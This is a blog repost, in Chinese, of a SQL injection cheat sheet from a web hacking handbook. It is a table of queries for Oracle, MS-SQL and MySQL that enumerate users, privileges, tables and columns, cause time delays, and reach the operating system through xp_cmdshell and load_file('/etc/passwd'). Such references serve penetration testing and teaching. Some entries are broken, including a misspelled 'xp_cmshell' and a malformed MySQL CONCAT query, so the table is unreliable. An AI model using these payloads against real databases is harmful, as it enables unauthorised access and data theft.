摘自:《The Web Application Hacker‘s Handbook》
中文名:《黑客攻防技术宝典Web实战篇》(第二版)
| Oracle | MS-SQL | MySQL | |
| ASCII和substring | ASCII(‘A‘) SUBSTR(‘ABCDE‘,2,3) | ASCII(‘A‘) SUBSTRING(‘ABCDE‘,2,3) | ASCII(‘A‘) SUBSTRING(‘ABCDE‘,2,3) |
| 获取当前数据库用户 | Select Sys.login_user from dual SELECT user FROM dual SYS_CONTEXT(‘USERENV‘,‘SESSION_USER‘) | select suser_sname() | SELECT user() |
| 引起时间延迟 | Utl_Http.request(‘http://xx.com‘) | waitfor delay ‘0:0:10‘ exec master..xp_cmdshell ‘ping localhost‘ | sleep(100) |
| 获取数据库版本 | select banner from v$version | select @@version | select @@version |
| 获取当前数据库 | SELECT SYS_CONTEXT(‘USERENV‘,‘DB_NAME‘) FROM dual | select db_name() 获取服务器名: select @@servername | Select database() |
| 获取当前用户权限 | SELECT privilege FROM session_privs | SELECT grantee,table_name,privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES | SELECT * FROM information_schema.user_privileges WHERE grantee=‘[user]‘ 此处[user]由SELECT user()的输入决定 |
| 显示所有表和列 | Select table_name||‘ ‘||column_name from all_tab_columns | SELECT table_name+‘ ‘,column_name from information_schema.columns | SELECT CONCAT+‘ ‘,column_name from information_schema.columns |
| 显示用户对象 | Select object_name,object_type from user_objects | SELECT name FROM sysobjects | SELECT table_name FROM information_schema.tables(或trigger_name from information_schema.triggers等) |
| 显示用户表 | Select object_name,object_type from user_objects WHERE object_type=‘TABLE‘或者显示用户访问的所有表:SELECT table_name FROM all_tables | SELECT name FROM sysobjects WHERE xtype=‘U‘ | SELECT table_name FROM information_schema.tables where table_type=‘BASE TABLE‘ and table_schema!=‘mysql‘ |
| 显示表foo的列名 | Select column_name,Name from user_tab_columns where table_name=‘foo‘如果目标数据不为当前应用程序用户所有,使用ALL_table_columns表 | SELECT column_name FROM information_schema.columns WHERE table_name=‘foo‘ | SELECT column_name FROM information_schema.columns WHERE table_name=‘foo‘ |
| 与操作系统交互(最简单的方式) | 请参考David Litchfield所著的The Oracle Hacker‘s Handbook一书 | exec xp_cmshell ‘dir c:\‘ | select load_file (‘/etc/passwd‘) |
本文出自 “saluteiceman” 博客,请务必保留此出处http://maxvision.blog.51cto.com/6269192/1695002
原文地址:http://maxvision.blog.51cto.com/6269192/1695002
